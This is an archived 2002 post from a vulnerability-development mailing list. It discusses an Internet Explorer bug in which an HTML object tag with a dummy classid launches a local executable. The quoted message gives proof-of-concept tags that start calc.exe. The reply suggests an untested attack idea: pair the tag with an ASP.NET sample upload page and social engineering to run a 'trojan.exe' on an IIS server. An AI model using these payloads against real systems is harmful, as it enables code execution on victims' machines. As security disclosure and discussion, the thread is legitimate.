Vulnerability Development mailing list archives
Re: IExplorer
From: "CT" <ct () arnet com ar>
Date: Thu, 7 Mar 2002 02:34:59 -0300
http://server/quickstart/aspplus/samples/webforms/ctrlref/htmlctrl/HtmlInput File/VB/HtmlInputFile1.aspx + <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/temp/trojan.exe"></object> Probably with this example [careless combination] and social engineering, a silly IIS box manager it affects ... in another way it is not checked since I have not had time for the moment. Best regards CT www.heinekenteam.com I wanted to install Opera in my Windows box, but... Luciano Pavarotti ate up. ----- Original Message ----- From: "Steve" <steve () frij com au> To: <vuln-dev () securityfocus com>; <bugtraq () securityfocus com> Sent: Wednesday, March 06, 2002 8:54 PM Subject: IExplorer
I know we have seen many websites already showing this as a problem. <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object> <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object> Of course, this is part of the HTML that is causing this problem, but I
was
unable to reformat the string to cause any substantial privilege
escalation
in the syste, via this bug.
Current thread:
- IExplorer Steve (Mar 06)
- Re: IExplorer CT (Mar 06)
- <Possible follow-ups>
- RE: IExplorer Chris Eidem (Mar 07)